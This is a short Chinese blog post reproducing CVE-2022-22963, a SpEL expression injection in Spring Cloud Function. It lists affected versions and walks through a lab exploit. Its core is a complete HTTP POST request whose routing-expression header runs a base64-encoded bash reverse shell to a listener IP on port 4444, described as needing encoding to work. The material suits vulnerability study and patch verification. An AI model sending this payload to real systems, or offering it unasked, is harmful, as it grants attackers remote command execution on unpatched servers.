2022-CVE-2022-22963 Spring Cloud Function SPEL表达式注入漏洞复现

2022-CVE-2022-22963 Spring Cloud Function SPEL表达式注入漏洞复现

202247

21:45

漏洞成因:

Spring Cloud Function 提供了一个通用的模型,用于在各种平台上部署基于函数的软件,包括像 Amazon AWS Lambda 这样的 FaaS(函数即服务,function as a service)平台。

漏洞影响版本:

3.0.0.RELEASE <= Spring Cloud Function <= 3.1.6

Spring Cloud Function <= 3.2.2

官方不再支持的旧版本

注:发布时间为20191122日至2022217

不受影响版本

Spring Cloud Function 3.1.7

Spring Cloud Function 3.2.3

环境搭建,搭建好的环境在使用BP之后变成了如下内容:

漏洞利用方式,使用BP抓包发送,再docker中查看内容,发现成功创建了success文件:

   

这里尝试反弹shell:

本地起一个nc,可以直接反弹shell这里要说明的是需要对payload部分进行java的payload

加密,否则不能正常反弹shell。

```

POST /functionRouter HTTP/1.1

Host: 192.168.19.128:8080

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36

Connection: close

spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMxLjI0NS80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}")

Content-Type: text/plain

Content-Length: 4

   

test

````

  

posted @   逆向菜狗  阅读(450)  评论(0编辑  收藏  举报
相关博文:
· 2022-Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947)
· ret2csu 蒸米 level5
· Spring Cloud Function SPEL表达式注入漏洞复现
· Spring Cloud Function SPEL表达式注入漏洞漏洞复现
· 漏洞复现-CVE-2022-22963-Spring Cloud Function SpEL RCE
阅读排行:
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· .NET10 - 预览版1新功能体验(一)
点击右上角即可分享
微信分享提示
AI FOR CODE 大赛